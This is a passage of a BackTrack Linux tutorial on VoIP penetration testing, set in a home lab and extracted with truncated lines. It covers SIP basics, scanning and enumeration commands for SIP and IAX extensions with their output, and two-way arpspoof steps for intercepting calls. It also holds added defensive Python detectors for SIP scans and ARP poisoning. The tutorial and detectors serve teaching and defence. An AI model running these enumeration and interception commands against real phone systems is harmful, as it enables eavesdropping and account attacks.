Pentesting VOIP - BackTrack Linux
Pentesting VOIP
From BackTrack Linux
This article was contributed by NightRang3r.
URL: http://www.backtrack.de/index.php?page=team#smtx
Twitter: http://twitter.com/#!/NightRang3r
Email: [email protected]
Contents
1 Penetration Testing VOIP with BackTrack
2 Typical VoIP Topologies
2.1 Self Hosted
2.2 Hosted Services
2.3 Online SIP Service
3 SIP Basics
3.1 SIP Requests/Methods
3.1.1 An Example SIP INVITE Request:
3.2 SIP Responses
3.2.1 An Example SIP Trying Response:
3.3 SIP Call Between 2 Phones Example
4 Attack Vectors
5 Information Gathering
5.1 SMAP
5.1.1 SMAP Usage:
5.1.2 Scanning a single host:
5.1.3 Scanning a range of IP addresses:
5.2 SIPSAK
5.3 SIPScan
5.3.1 Sipscan usage:
5.3.2 Scanning a subnet:
5.4 SVMAP
5.4.1 Scanning an IP range:
5.4.2 Enabling fingerprinting scanning
5.5 Extensions Enumeration
5.5.1 Svwar
5.5.1.1 Usage:
5.5.1.2 Example:
5.5.2 Enumiax
6 Monitoring Traffic and Eavesdropping Phone calls
6.1 Arp Poisoning using Arpspoof
6.2 Capturing traffic and Eavesdropping using Wireshark
6.3 VoIPong
6.3.1 Playing the file:
6.4 Vomit
6.5 UCsniff
6.5.1 Monitor Mode Usage
http://www.backtracklinux.org/wiki/index.php/Pentesting_VOIP
1/40
7/12/2015
6.5.2 MITM Learning Mode Usage
6.5.3 MITM Target Mode
6.6 Xplico
6.7 Capturing SIP Authentication using SIPDump
7 Attacking Authentication
7.1 Cracking SIP Digest response hashes
7.1.1 SIPCrack Usage:
7.1.2 Dictionary attack
7.1.2.1 Creating a six chars numeric dictionary:
7.1.2.2 Cracking the Digest Response:
7.1.3 Brute Force attack using John The Ripper
7.2 Bruteforcing SIP Accounts
8 VLAN Hopping
8.1 VoIP Hopper
8.2 ACE
9 Denial Of Service
9.1 Inviteflood
9.2 Rtpflood
9.3 Iaxflood
9.4 Teardown
10 Spoofing Caller ID
11 Attacking VoIP Using Metasploit
11.1 Metasploit VoIP Modules
11.1.1 Auxiliaries
11.1.2 Exploits
11.2 Scanning SIP Enabled Devices
11.3 Enumerating SIP extensions/Usernames
11.4 Spoofing Caller ID auxiliary
11.5 Exploiting VoIP systems
12 Closing Words
13 About The Author
14 References
Penetration Testing VOIP with BackTrack
VoIP is an exciting technology which provides many benefits and cost effective solutions for communication. More and m
and enterprise businesses are replacing their old traditional telephony systems with IP based ones. A VoIP based PBX
provide many features such as: Multiple Extensions, Caller ID, Voicemail, IVR capabilities, Recording of conversations,
Usage with hardware based telephones or software based (aka softphones). Nowadays there are many vendors for PBX, I
telephones, VoIP services and equipment such as: CISCO, AVAYA and ASTERISK, SNOM, THOMSON. With new t
comes a new challenge for both the defensive and offensive side of security. One of the great dangers of traditional pho
was that it was susceptible to eavesdropping. The old school way to eavesdrop on somebody's phone line was to physic
connect a small transmitter which was connected inside or outside their premises somewhere along the phone cord.
IP telephony systems are also susceptible to eavesdropping, doing so in an IP environment is a little bit more difficult to e
detect and requires more knowledge and the right set of tools. In this article we won't discuss a particular vendor or tec
we will take a look at the concepts and the tools available for attacking VoIP available for us in Backtrack Linux. The m
this article is to present the tools and their purpose in order to help you choose the right tool for the right situation. We wi
some real world attack vectors and discover how BackTrack can assist us pentesting VoIP. We will also examine some o
which are present in BackTrack and their usage.
Typical VoIP Topologies
There are several ways IP based telephony can be implemented, here are some common topologies and usage:
Self Hosted
A PBX (i.e. Asterisk) is installed at the client site and connected to an ISP or telephony service provider PSTN via a SIP T
the VoIP traffic flows through a dedicated Vlan.
Visio diagram by Amir Avraham
Hosted Services
There is no need for a PBX at site. Just a switch, a router, IP phones and a connection to the service provider PBX via inte
IP/VPN connection, each phone is configured with SIP account information.
Online SIP Service
Services like sipme.me provide an application for PC or smartphones and a free SIP account, offering low prices for inter
calls and free calls between the service users by assigning a phone number to each subscriber.
SIP Basics
The SIP (Session Initiation Protocol) role is to set up, terminate or modify a voice or a video call where the voice and/or v
are being carried by a protocol like RTP (Real-time Transport Protocol). SIP is an application layer protocol which uses U
transport (TCP and SCTP can be used as well).
SIP usually uses port 5060 TCP or UDP for unencrypted signaling or 5061 for encrypted transportation using TL
SIP is an ASCII based protocol which has some similar elements like in the HTTP protocol by using a Request/Response
Much like an HTTP request from a browser, a SIP client request is made using a SIP URI, a user agent and a method/reque
uses an email-like address format: user/phone@domain/ip. A typical SIP URI looks like:
sip:[email protected], sip:[email protected], sip:[email protected]:5060
According to the request made by the client a response will be received with a status or error code, the following tables de
available requests and responses in the SIP protocol.
SIP Requests/Methods
Request: Description
INVITE: Used to invite an account to participate in a call session.
ACK: Acknowledge an INVITE request.
CANCEL: Cancel a pending request.
REGISTER: Register user with a SIP server.
OPTIONS: Lists information about the capabilities of a caller.
BYE: Terminates a session between two users in a call.
REFER: Indicates that the recipient (identified by the Request-URI) should contact a third party using the contact information provided in the request.
SUBSCRIBE: The SUBSCRIBE method is used to request current state and state updates from a remote node.
NOTIFY: The NOTIFY method is used to notify a SIP node that an event which has been requested by an earlier SUBSCRIBE method has occurred.
An Example SIP INVITE Request:
INVITE sip:[email protected] SIP/2.0
Via: SIP/2.0/UDP 192.168.1.102;rport;branch=z9hG4bKvbxaoqar
Max-Forwards: 70
To:
From: "NightRanger";tag=eihgg
Call-ID: hfxsabthoymshub@backtrack
CSeq: 649 INVITE
Contact:
Content-Type: application/sdp
Allow: INVITE,ACK,BYE,CANCEL,OPTIONS,PRACK,REFER,NOTIFY,SUBSCRIBE,INFO,MESSAGE
Supported: replaces,norefersub,100rel
User-Agent: Twinkle/1.2
Content-Length: 310
SIP Responses
Response: Description
1xx: Informational responses. Request received and being processed.
2xx: Successful responses. The action was successfully received, understood, and accepted.
3xx: Redirection responses.
4xx: Request failure responses. The request contains bad syntax or cannot be fulfilled at the server.
5xx: Server failure responses. The server failed to fulfill an apparently valid request.
6xx: Global failure responses. The request cannot be fulfilled at any server.
An Example SIP Trying Response:
SIP/2.0 100 Trying
Via: SIP/2.0/UDP 192.168.1.102;branch=z9hG4bKpmphujka;received=192.168.1.102;rport=5060
From: "NIghtRanger";tag=eihgg
To:
Call-ID: hfxsabthoymshub@backtrack
CSeq: 650 INVITE
User-Agent: Asterisk PBX
Allow: INVITE,ACK,CANCEL,OPTIONS,BYE,REFER,SUBSCRIBE,NOTIFY
Supported: replaces
Contact:
Content-Length: 0
SIP Call Between 2 Phones Example
The calling phone sends an INVITE.
The called phone sends back a response of 100 (Trying).
The called phone then starts to ring and sends a response of 180 (Ringing).
When the caller picks up the phone the called phone sends a response of 200 (OK).
The calling phone sends an ACK response.
Conversation begins via RTP.
When the caller hangs up the phone a BYE request is sent.
The calling phone responds with 200 (OK).
AttackVectors
Before we get started with the tools let's have a look at some common VoIP attack vectors:
Information Gathering, Footprinting and Enumeration.
Monitoring Traffic and Eavesdropping Phone calls.
Attacking Authentication.
VLAN Hopping.
Denial of Service / Flooding.
Spoofing Caller ID.
In order to test the tools I have set up a TRIXBOX PBX System and created 6 extensions. I will be using two softphones,
based client called Twinkle and the 2nd is a Windows based client called X-Lite. I will be using the latest and greatest rel
Backtrack Linux which is R2. You can find most of the VoIP attack tools in Backtrack under the /pentest/voip/ direc
root@bt:~# cd /pentest/voip/
root@bt:/pentest/voip#
Or you can simply navigate using the KDE menu to the Backtrack > Voice Over IP submenus:
Information Gathering
This phase is where we gather information about the topology, servers and clients to learn as much information as we can
launch a successful attack. What we are interested in finding is live hosts, PBX type and version, VoIP servers/gateways,
(hardware and software) types and versions etc. Instead of enumerating usernames we will be enumerating SIP extens
take a look at some of the tools which are available in Backtrack to help us find, identify and enumerate VoIP enabled devic
SMAP
Backtrack includes a great tool called SMAP which is a simple scanner for SIP enabled devices. SMAP sends off various
requests awaiting responses from SIP enabled DSL routers, proxies and user agents.
It could be considered a mashup of NMAP and sipsak.
SMAP Usage:
root@bt:/pentest/voip/smap# ./smap
smap 0.6.0 http://www.wormulon.net/
usage: smap [Options]
-h: this help
-d: increase debugging
-o: enable fingerprinting
-O: enable more verbose fingerprinting
-l: fingerprint learning mode
-t: TCP transport
-u: UDP transport (default
-P0: Treat all hosts as online - skip host discovery
-p: destination port
-r: messages per second rate limit
-D: SIP domain to use without leading sip:
-w: timeout in msec
Scanning a single host:
root@bt:/pentest/voip/smap# ./smap 192.168.1.104
smap 0.6.0 http://www.wormulon.net/
192.168.1.104: ICMP reachable, SIP enabled
1 host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)
Scanning a range of IP addresses:
root@bt:/pentest/voip/smap# ./smap 192.168.1.130/24
smap 0.6.0 http://www.wormulon.net/
192.168.1.20: ICMP reachable, SIP enabled
192.168.1.22: ICMP reachable, SIP enabled
192.168.1.0: ICMP unreachable, SIP disabled
192.168.1.1: ICMP unreachable, SIP disabled
192.168.1.2: ICMP unreachable, SIP disabled
192.168.1.3: ICMP unreachable, SIP disabled
192.168.1.250: ICMP unreachable, SIP disabled
192.168.1.251: ICMP unreachable, SIP disabled
192.168.1.252: ICMP unreachable, SIP disabled
192.168.1.253: ICMP unreachable, SIP disabled
192.168.1.254: ICMP unreachable, SIP disabled
192.168.1.255: ICMP unreachable, SIP disabled
256 hosts scanned, 7 ICMP reachable, 2 SIP enabled (0.8%)
Now that we have identified SIP enabled hosts we can use SMAP to fingerprint the server/client type and version:
root@bt:/pentest/voip/smap# ./smap -O 192.168.1.104
smap 0.6.0 http://www.wormulon.net/
192.168.1.104: ICMP reachable, SIP enabled
best guess (70% sure) fingerprint:
Asterisk PBX SVN trunk r56579
User-Agent: Asterisk PBX
1 host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)
In case SMAP could not fingerprint our host we use the -l argument to put it in learning mode to provide some useful info
root@bt:/pentest/voip/smap# ./smap -l 192.168.1.104
smap 0.6.0 http://www.wormulon.net/
NOTICE: test_accept: "Accept: application/sdp"
NOTICE: test_allow: "Allow: INVITE,ACK,CANCEL,OPTIONS,BYE,REFER,SUBSCRIBE,NOTIFY"
NOTICE: test_supported: "Supported: replaces"
NOTICE: test_via: transport capitalization: 2
NOTICE: test_via: "branch;alias;received;rport"
NOTICE: test_via: Please add new cmpstr
NOTICE: test_via: transport capitalization: 2
192.168.1.104: ICMP reachable, SIP enabled
best guess (70% sure) fingerprint:
Asterisk PBX SVN trunk r56579
FINGERPRINT information:
newmethod=501
accept_class=2
allow_class=201
supported_class=8
via_class=2
hoe_class=ignore
options=200
brokenfromto=404
prack=481
ping=501
invite=200
User-Agent: Asterisk PBX
1 host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)
Another useful feature of SMAP is the -d argument which enables debug output for verbosity; try to use the -o along with
the fingerprinting process in details.
root@bt:/pentest/voip/smap# ./smap -d 192.168.1.104
smap 0.6.0 http://www.wormulon.net/
DEBUG: local IP: 212.235.66.182
DEBUG: local IP: 212.235.66.182
DEBUG: bind() successful
DEBUG: RAW socket open
DEBUG: moving 1 from S_START to S_PING
DEBUG: ICMP error Echo Reply
DEBUG: 192.168.1.104 / 1 request: SIP OPTIONS request (valid)
DEBUG: response belongs to task 1 (192.168.1.104)
DEBUG: ACK: ACK sip:localhost SIP/2.0
Via: SIP/2.0/UDP 212.235.66.182:12345;branch=z9hG4bK.56689;alias;received=192.168.1.105;rport=5060
From: ;tag=6b9ae50e67345d3b
To: ;tag=as14262fec
Call-ID: [email protected]
CSeq: 23915 ACK
Content-Length: 0
User-Agent: smap 0.6.0
end of ACK
192.168.1.104: ICMP reachable, SIP enabled
DEBUG: destroying task 1
1 host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)
SIPSAK
SIPSAK is used for testing SIP enabled applications and devices using the OPTIONS request method only. We can use it t
fingerprint and enumeration. You won't find sipsak in the /pentest/voip/ directory; you can execute it from any location
typing sipsak.
root@bt:~# sipsak
sipsak 0.9.6 by Nils Ohlmeier
Copyright (C) 2002-2004 FhG Fokus
Copyright (C) 2004-2005 Nils Ohlmeier
[email protected]
shoot : sipsak [-f FILE] [-L] -s SIPURI
trace : sipsak -T -s SIPURI
usrloc: sipsak -U [-I|M] [-b NUMBER] [-e NUMBER] [-x NUMBER] [-z NUMBER] -s SIPURI
usrloc: sipsak -I|M [-b NUMBER] [-e NUMBER] -s SIPURI
usrloc: sipsak -U [-C SIPURI] [-x NUMBER] -s SIPURI
message: sipsak -M [-B STRING] [-O STRING] [-c SIPURI] -s SIPURI
flood : sipsak -F [-e NUMBER] -s SIPURI
random: sipsak -R [-t NUMBER] -s SIPURI
additional parameter in every mode:
[-a PASSWORD] [-d] [-i] [-H HOSTNAME] [-l PORT] [-m NUMBER] [-n] [-N]
[-r PORT] [-v] [-V] [-w]
-h displays this help message
-V prints version string only
-f FILE the file which contains the SIP message to send
use - for standard input
-L de-activate CR (\r) insertion in files
-s SIPURI the destination server uri in form
sip:[user@]servername[:port]
-T activates the traceroute mode
-U activates the usrloc mode
-I simulates a successful calls with itself
-M sends messages to itself
-C SIPURI use the given uri as Contact in REGISTER
-b NUMBER the starting number appendix to the user name (default: 0)
-e NUMBER the ending numer of the appendix to the user name
-o NUMBER sleep number ms before sending next request
-x NUMBER the expires header field value (default: 15)
-z NUMBER activates randomly removing of user bindings
-F activates the flood mode
-R activates the random modues (dangerous)
-t NUMBER the maximum number of trashed character in random mode
(default: request length)
-l PORT the local port to use (default: any)
-r PORT the remote port to use (default: 5060)
-p HOSTNAME request target (outbound proxy)
-H HOSTNAME overwrites the local hostname in all headers
-m NUMBER the value for the max-forwards header field
-n use FQDN instead of IPs in the Via-Line
-i deactivate the insertion of a Via-Line
-a PASSWORD password for authentication
(if omitted password="")
-u STRING Authentication username
-d ignore redirects
-v each v produces more verbosity (max. 3)
-w extract IP from the warning in reply
-g STRING replacement for a special mark in the message
-G activates replacement of variables
-N returns exit codes Nagios compliant
-q STRING search for a RegExp in replies and return error
on failure
-W NUMBER return Nagios warning if retrans > number
-B STRING send a message with string as body
-O STRING Content-Disposition value
-P NUMBER Number of processes to start
-A NUMBER number of test runs and print just timings
-S use same port for receiving and sending
-c SIPURI use the given uri as From in MESSAGE
-D NUMBER timeout multiplier for INVITE transactions
and reliable transports (default: 64)
-E STRING specify transport to be used
-j STRING adds additional headers to the request
Here is an example for using sipsak to fingerprint a SIP enabled device. We can see in the result that the device we queried
Audiocodes MP-114 FXS gateway.
root@bt:~# sipsak -vv -s sip:192.168.1.221
message received:
SIP/2.0 200 OK
Via: SIP/2.0/UDP 127.0.1.1:51601;branch=z9hG4bK.18a1b21f;rport;alias
From: sip:[email protected]:51601;tag=97ac9e5
To: sip:192.168.1.221;tag=1c1785761661
Call-ID: [email protected]
CSeq: 1 OPTIONS
Contact:
Supported: em,100rel,timer,replaces,path,resource-priority
Allow: REGISTER,OPTIONS,INVITE,ACK,CANCEL,BYE,NOTIFY,PRACK,REFER,INFO,SUBSCRIBE,UPDATE
Server: Audiocodes-Sip-Gateway-MP-114 FXS/v.5.40A.040.005
X-Resources: telchs=4/0;mediachs=0/0
Accept: application/sdp, application/simple-message-summary, message/sipfrag
Content-Type: application/sdp
Content-Length: 343
v=0
o=AudiocodesGW 1785763980 1785763858 IN IP4 192.168.1.221
s=Phone-Call
c=IN IP4 192.168.1.221
t=0 0
m=audio 6000 RTP/AVP 18 8 0 127
a=rtpmap:18 G729/8000
a=fmtp:18 annexb=no
a=rtpmap:8 PCMA/8000
a=rtpmap:0 PCMU/8000
a=rtpmap:127 telephone-event/8000
a=fmtp:127 0-15
a=ptime:20
a=sendrecv
a=rtcp:6001 IN IP4 192.168.1.221
** reply received after 67.923 ms **
SIP/2.0 200 OK
final received
SIPScan
Sipscan is a simple scanner for SIP enabled hosts, it can scan a single host or an entire subnet.
Sipscan usage:
root@bt:/pentest/voip/sipscan# ./sipscan --help
./sipscan version [unknown] calling Getopt::Std::getopts (version 1.05),
running under Perl version 5.10.0.
Usage: sipscan [options]
-v Be verbose.
-i ip|if Interface/IP for SIP headers (default: IP from ppp0)
-p port remote port to scan. (default: 5060)
-l port local origin of packets. (default: 5060)
-d n[p] Wait n ms after each sent packet (default: 50ms) or if 'p' is
given, send n packets per second (default: 20)
-w n Wait n ms for remaining answers (default: 2000ms)
Network spec contains the wildcard * or ranges n-m.
Scanning a subnet:
root@bt:/pentest/voip/sipscan# ./sipscan -i eth0 192.168.1.1-254
192.168.1.20: Grandstream HT502 V1.2A 1.0.1.35
192.168.1.21: Grandstream HT502 V1.2A 1.0.1.35
192.168.1.22: Asterisk PBX
192.168.1.104: Asterisk PBX
192.168.1.128: FreeSWITCH-mod_sofia/1.0.trunk-16055
192.168.1.174: Grandstream HT502 V1.2A 1.0.1.35
192.168.1.175: Asterisk PBX 1.6.0.9-samy-r27
192.168.1.219: "Exelmind Call Control Switch (CCS)"
192.168.1.248: MailVision HostLynx/2.1 'GA'
SVMAP
SVMAP is a part of a suite of tools called SIPVicious and it's my favorite scanner of choice. It can be used to scan, identif
fingerprint a single IP or a range of IP addresses. Svmap allows specifying the request method which is being used for sca
default method is OPTIONS, it offers debug and verbosity options and even allows scanning the SRV records for SIP on
destination domain. You can use ./svmap -h in order to view all the available arguments.
root@bt:/pentest/voip/sipvicious# ./svmap.py
Usage: svmap.py [options] host1 host2 hostrange
examples:
svmap.py 10.0.0.1-10.0.0.255 \
> 172.16.131.1 sipvicious.org/22 10.0.1.1/24 \
> 1.1.1.1-20 1.1.2-20.* 4.1.*.*
svmap.py -s session1 --randomize 10.0.0.1/8
svmap.py --resume session1 -v
svmap.py -p5060-5062 10.0.0.3-20 -m INVITE
Scanning an IP range:
root@bt:/pentest/voip/sipvicious# ./svmap.py 192.168.1.1-254
| SIP Device | User Agent | Fingerprint |
| 192.168.1.104:5060 | Asterisk PBX | disabled |
| 192.168.1.103:5060 | Twinkle/1.4.2 | disabled |
Enabling fingerprinting scanning
root@bt:/pentest/voip/sipvicious# ./svmap.py 192.168.1.1-254 --fp
Extensions Enumeration
Extension enumeration can aid an attacker by finding valid extensions on a VoIP system which later can lead to a brute fo
on the SIP accounts. Extension enumeration works by examining errors returned by SIP request methods like REGISTE
OPTIONS and INVITE.
Svwar
Svwar is also a tool from the sipvicious suite, it allows to enumerate extensions by using a range of extensions or using a dic
svwar supports all of the three extension enumeration methods as mentioned above, the default method for enumeratio
REGISTER.
Usage:
root@bt:/pentest/voip/sipvicious# ./svwar.py
Usage: svwar.py [options] target
examples:
svwar.py -e100-999 10.0.0.1
svwar.py -d dictionary.txt 10.0.0.2
Example:
root@bt:/pentest/voip/sipvicious# ./svwar.py -e100-400 192.168.1.104
| Extension | Authentication |
| 201 | reqauth |
| 200 | reqauth |
| 203 | reqauth |
| 202 | reqauth |
| 303 | reqauth |
| 305 | reqauth |
Svwar has identified all the extensions I've created on my Trixbox server. You can specify another SIP method by using th
argument, you can also add -v or -vv for verbosity.
root@bt:/pentest/voip/sipvicious# ./svwar.py -e100-400 192.168.1.104 -m INVITE -v
INFO:TakeASip:trying to get self ip .. might take a while
INFO:root:start your engines
INFO:TakeASip:Ok SIP device found
INFO:TakeASip:extension '200' exists - requires authentication
INFO:TakeASip:extension '201' exists - requires authentication
INFO:TakeASip:extension '203' exists - requires authentication
INFO:TakeASip:extension '303' exists - requires authentication
INFO:TakeASip:extension '303' exists - requires authentication
INFO:TakeASip:extension '305' exists - requires authentication
INFO:root:we have 6 extensions
| Extension | Authentication |
| 201 | reqauth |
| 200 | reqauth |
| 203 | reqauth |
| 202 | reqauth |
| 303 | reqauth |
| 305 | reqauth |
INFO:root:Total time: 0:00:21.944731
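As an added example (not part of the original article or of any of the tools above), the following Python script parses SIP messages of the shape shown in the SIP Basics section, classifies responses by the 1xx to 6xx table, and flags the two things a defender would log from the scans and the svwar sweep above: a scanner User-Agent such as the "smap 0.6.0" visible in the smap debug output, and one source sending REGISTER, OPTIONS or INVITE to many distinct targets. The sample traffic, its IP addresses and the "friendly-scanner" string (the well-known SIPVicious default User-Agent, which this page does not show) are constructed for the example.

```python
"""Parse SIP messages and flag scanner / extension-enumeration behaviour.

Added example for this article; the sample traffic is constructed, not captured.
"""
from collections import defaultdict

# User-Agent prefixes of the scanners used in this article (smap, sipsak) plus
# "friendly-scanner", the well-known default User-Agent of the SIPVicious tools.
SCANNER_UAS = ("smap", "sipsak", "friendly-scanner")

# Response classes from the SIP Responses table above.
RESPONSE_CLASSES = {1: "Informational", 2: "Success", 3: "Redirection",
                    4: "Request failure", 5: "Server failure", 6: "Global failure"}


def parse_sip(raw):
    """Split a SIP message into start line, headers and body (RFC 3261 layout)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    start = lines[0].split(" ", 2)
    msg = {"headers": {}, "body": body}
    if start[0].startswith("SIP/"):            # response: "SIP/2.0 100 Trying"
        msg["type"] = "response"
        msg["status"] = int(start[1])
        msg["reason"] = start[2] if len(start) > 2 else ""
        msg["class"] = RESPONSE_CLASSES.get(msg["status"] // 100, "Unknown")
    else:                                       # request: "INVITE sip:... SIP/2.0"
        msg["type"] = "request"
        msg["method"], msg["uri"] = start[0], start[1]
    for line in lines[1:]:                      # header names are case-insensitive
        name, _, value = line.partition(":")
        msg["headers"][name.strip().lower()] = value.strip()
    return msg


def detect_scans(traffic, min_targets=5):
    """Return alert strings for a list of (src_ip, raw_message) pairs.

    Two signals: a known scanner User-Agent, and a single source sending
    REGISTER/OPTIONS/INVITE to at least `min_targets` distinct targets (the
    svwar -e100-400 sweep shown above touches hundreds of extensions).
    """
    alerts = []
    probes = defaultdict(set)                  # (src_ip, method) -> targets
    for src_ip, raw in traffic:
        msg = parse_sip(raw)
        if msg["type"] != "request":
            continue
        ua = msg["headers"].get("user-agent", "")
        if ua.lower().startswith(SCANNER_UAS):
            alerts.append(f"{src_ip}: scanner User-Agent '{ua}'")
        if msg["method"] in ("REGISTER", "OPTIONS", "INVITE"):
            # REGISTER names the probed extension in To:, while OPTIONS sweeps
            # vary the Request-URI host, so the (URI, To) pair is the target.
            probes[(src_ip, msg["method"])].add((msg["uri"], msg["headers"].get("to", "")))
    for (src_ip, method), targets in probes.items():
        if len(targets) >= min_targets:
            alerts.append(f"{src_ip}: {method} probes to {len(targets)} distinct targets")
    return alerts


def _req(method, uri, to_uri, ua, call_id):
    """Build a minimal constructed SIP request for the sample traffic."""
    return (f"{method} {uri} SIP/2.0\r\n"
            f"Via: SIP/2.0/UDP 192.168.1.105;branch=z9hG4bK{call_id}\r\n"
            f"From: <sip:100@192.168.1.104>;tag=t{call_id}\r\n"
            f"To: <{to_uri}>\r\n"
            f"Call-ID: {call_id}@backtrack\r\n"
            f"CSeq: 1 {method}\r\n"
            f"User-Agent: {ua}\r\n"
            f"Content-Length: 0\r\n\r\n")


PBX = "sip:192.168.1.104"
# Constructed traffic: a legitimate softphone, an smap OPTIONS probe, and an
# svwar-style REGISTER sweep hiding behind a softphone-looking User-Agent.
SAMPLE_TRAFFIC = [
    ("192.168.1.118", _req("REGISTER", PBX, "sip:201@192.168.1.104", "Twinkle/1.2", "c1")),
    ("192.168.1.118", _req("INVITE", "sip:200@192.168.1.104", "sip:200@192.168.1.104",
                           "Twinkle/1.2", "c2")),
    ("192.168.1.150", _req("OPTIONS", PBX, PBX, "smap 0.6.0", "c3")),
] + [
    ("192.168.1.105", _req("REGISTER", PBX, f"sip:{ext}@192.168.1.104", "X-Lite", f"e{ext}"))
    for ext in (200, 201, 202, 203, 303, 305)
]

if __name__ == "__main__":
    for alert in detect_scans(SAMPLE_TRAFFIC):
        print(alert)
```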
Enumiax
Enumiax is used to enumerate Asterisk Exchange protocol usernames. It allows for a dictionary attack or a sequential Use
Guessing
root@bt:/pentest/voip/enumiax# ./enumiax
enumIAX 1.0
Dustin D. Trammell
Usage: enumiax [options] target
options:
-d Dictionary attack using file
-i Interval for auto-save (# of operations, default 1000)
-m # Minimum username length (in characters)
-M # Maximum username length (in characters)
-r # Rate-limit calls (in microseconds)
-s Read session state from state file
-v Increase verbosity (repeat for additional verbosity)
-V Print version information and exit
-h Print help/usage information and exit
root@bt:/pentest/voip/enumiax# ./enumiax -v -m3 -M3 192.168.1.104
enumIAX 1.0
Dustin D. Trammell
Target Aquired: 192.168.1.104
Connecting to 192.168.1.104 via udp on port 4569...
Starting enum process at: Sat Feb 5 13:04:18 2011
Now working on 3 character usernames...
#################################
Trying username: "000"
#################################
Trying username: "001"
#################################
Trying username: "002"
#################################
Trying username: "003"
#################################
Trying username: "004"
#################################
Trying username: "005"
#################################
Trying username: "006"
#################################
Trying username: "007"
#################################
Trying username: "008"
#################################
...
root@bt:/pentest/voip/enumiax# ./enumiax -d dict -v 192.168.1.104
enumIAX 1.0
Dustin D. Trammell
Target Aquired: 192.168.1.104
Connecting to 192.168.1.104 via udp on port 4569...
Starting enum process at: Sat Feb 5 13:02:39 2011
#################################
Trying username: "guest"
#################################
Trying username: "iaxtel"
#################################
Trying username: "iaxtel2"
#################################
Trying username: "100"
#################################
Trying username: "101"
#################################
Trying username: "200"
#################################
Trying username: "201"
#################################
Trying username: "202"
#################################
Trying username: "203"
End of dictionary file reached, exiting.
Monitoring Traffic and Eavesdropping Phone calls
Monitoring VoIP traffic can allow an attacker to capture SIP requests and RTP data sent from clients to server and back. It c
two attack vectors:
Capturing SIP authentication (we will later discuss this topic in the attacking authentication section).
Eavesdropping on users' phone calls.
For demonstration purposes we will use the following scenario:
For this attack vector we will need to perform a Man in The Middle attack which will require the following steps:
Arp poisoning/spoofing
Sniffing traffic
Decoding RTP data to an audio file.
Arp Poisoning using Arpspoof
Before we can begin to sniff traffic we will need to arp poison our switch/gateway. We'll be using a tool called Arpspoof
located in the /usr/sbin/ folder in Backtrack, in fact you can just invoke it from anywhere by typing: arpspoof
can use arpspoof we will need to enable IP forwarding:
root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward
Arpspoof syntax should look as follows:
root@bt:~# arpspoof
Version: 2.4
Usage: arpspoof [-i interface] [-t target] host
For a successful MITM attack we will need to spoof both ways:
arpspoof -t victim gateway
arpspoof -t gateway victim
We will let our Arp poisoning run in the background while performing a capture using Wireshark.
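As an added example (not from the article), here is a small Python ARP monitor that shows what the two-way arpspoof step above looks like from the defender's side: it learns the IP-to-MAC binding from ARP replies and alerts when an IP suddenly answers from a new MAC, when one MAC claims both the gateway and a phone, and when the binding flips back as the tool re-ARPs on exit. The reply sequence and all MAC addresses are constructed; this is a teaching model of the detection, not a replacement for arpwatch or dynamic ARP inspection on the switch.

```python
"""ARP-poisoning detector modelling the arpspoof step above (added example).

Input is a list of ARP replies as a sniffer would record them; the sample
sequence and all MAC addresses are constructed for this example.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ArpReply:
    ts: int          # seconds since capture start
    sender_ip: str   # IP address the reply claims to own
    sender_mac: str  # MAC address it claims it with
    target_ip: str   # host the reply was sent to


class ArpWatch:
    """Learn IP->MAC bindings from replies and flag poisoning symptoms.

    Symptom 1: an IP changes MAC (and later flips back when the tool re-ARPs).
    Symptom 2: one MAC claims more than one IP, e.g. the gateway and a phone,
    which is what 'arpspoof -t victim gateway' plus 'arpspoof -t gateway victim'
    produces on the wire.
    """

    def __init__(self, baseline=None):
        self.baseline = dict(baseline or {})   # trusted ip -> mac, if known
        self.current = {}                       # ip -> mac seen most recently
        self.claims = defaultdict(set)          # mac -> ips it has claimed
        self.flagged_macs = set()
        self.alerts = []

    def observe(self, r):
        """Process one reply; return the alerts it raised (possibly none)."""
        new = []
        known = self.current.get(r.sender_ip)
        if known is None:
            # First time we see this IP: trust it unless a baseline disagrees.
            trusted = self.baseline.setdefault(r.sender_ip, r.sender_mac)
            if trusted != r.sender_mac:
                new.append(f"t={r.ts} {r.sender_ip}: MAC {r.sender_mac} "
                           f"differs from trusted {trusted}")
            self.current[r.sender_ip] = r.sender_mac
        elif known != r.sender_mac:
            kind = ("restored to baseline"
                    if r.sender_mac == self.baseline.get(r.sender_ip) else "changed")
            new.append(f"t={r.ts} {r.sender_ip}: MAC {kind} {known} -> {r.sender_mac}")
            self.current[r.sender_ip] = r.sender_mac
        ips = self.claims[r.sender_mac]
        if r.sender_ip not in ips:
            ips.add(r.sender_ip)
            if len(ips) > 1 and r.sender_mac not in self.flagged_macs:
                self.flagged_macs.add(r.sender_mac)
                new.append(f"t={r.ts} {r.sender_mac} now claims {len(ips)} IPs: "
                           f"{', '.join(sorted(ips))} (MITM pattern)")
        self.alerts.extend(new)
        return new


def analyse(replies, baseline=None):
    """Feed a reply sequence through ArpWatch and return all alerts."""
    watch = ArpWatch(baseline)
    for r in replies:
        watch.observe(r)
    return watch.alerts


GW_MAC, PHONE_MAC, ATTACKER_MAC = "00:11:22:33:44:01", "00:11:22:33:44:18", "00:0c:29:aa:bb:cc"
# Constructed sequence: normal traffic, a two-way arpspoof run, its periodic
# refresh, and the re-ARP that happens when the tool exits cleanly.
SAMPLE_REPLIES = [
    ArpReply(0, "192.168.1.1", GW_MAC, "192.168.1.118"),
    ArpReply(1, "192.168.1.118", PHONE_MAC, "192.168.1.1"),
    ArpReply(10, "192.168.1.1", ATTACKER_MAC, "192.168.1.118"),   # arpspoof -t victim gateway
    ArpReply(10, "192.168.1.118", ATTACKER_MAC, "192.168.1.1"),   # arpspoof -t gateway victim
    ArpReply(12, "192.168.1.1", ATTACKER_MAC, "192.168.1.118"),   # refresh, nothing new
    ArpReply(90, "192.168.1.1", GW_MAC, "192.168.1.118"),         # re-ARP on exit
    ArpReply(90, "192.168.1.118", PHONE_MAC, "192.168.1.1"),
]

if __name__ == "__main__":
    for line in analyse(SAMPLE_REPLIES):
        print(line)
```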
Capturing traffic and Eavesdropping using Wireshark
Now let's fire up Wireshark to capture some traffic. We will use the following Wireshark capture filter:
not broadcast and not multicast and host 192.168.1.118
